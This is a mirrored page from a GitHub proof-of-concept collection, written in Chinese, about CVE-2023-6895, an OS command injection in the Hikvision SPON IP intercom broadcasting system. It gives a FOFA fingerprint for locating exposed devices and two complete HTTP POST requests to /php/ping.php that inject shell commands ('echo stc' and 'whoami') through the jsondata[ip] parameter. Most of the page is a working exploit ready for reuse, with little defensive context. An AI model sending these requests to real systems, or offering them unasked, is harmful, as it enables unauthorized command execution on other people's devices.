admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 11:26:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/海康威视/海康威视SPONIP网络对讲广播系统/海康威视SPONIP网络对讲广播系统存在命令执行漏洞(CVE-2023-6895).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.6 KiB
Raw Blame History

海康威视SPON IP网络对讲广播系统存在命令执行漏洞(CVE-2023-6895)

一、漏洞简介

Hikvision Intercom Broadcasting System是中国海康威视Hikvision公司的一个对讲广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。

二、影响版本

  • 海康威视SPON IP网络对讲广播系统

三、资产测绘

  • fofaicon_hash="-1830859634"
  • 特征

1703683596082-c644fff9-438a-460f-891f-450ad725c4bd.png

四、漏洞复现

POST /php/ping.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: {hostname}
Content-Length: 40
Content-Type: application/x-www-form-urlencoded

jsondata[ip]=a|echo stc&jsondata[type]=1

1703683644604-a5807506-f785-435a-b533-2746677fe24b.png

POST /php/ping.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: {hostname}
Content-Length: 40
Content-Type: application/x-www-form-urlencoded

jsondata[ip]=a|whoami&jsondata[type]=1

1703683677233-dde83799-2b24-4b7b-984b-0429def16e4a.png

更新: 2024-02-29 23:57:17
原文: https://www.yuque.com/xiaokp7/ocvun2/oi2zyivh6brw6t9s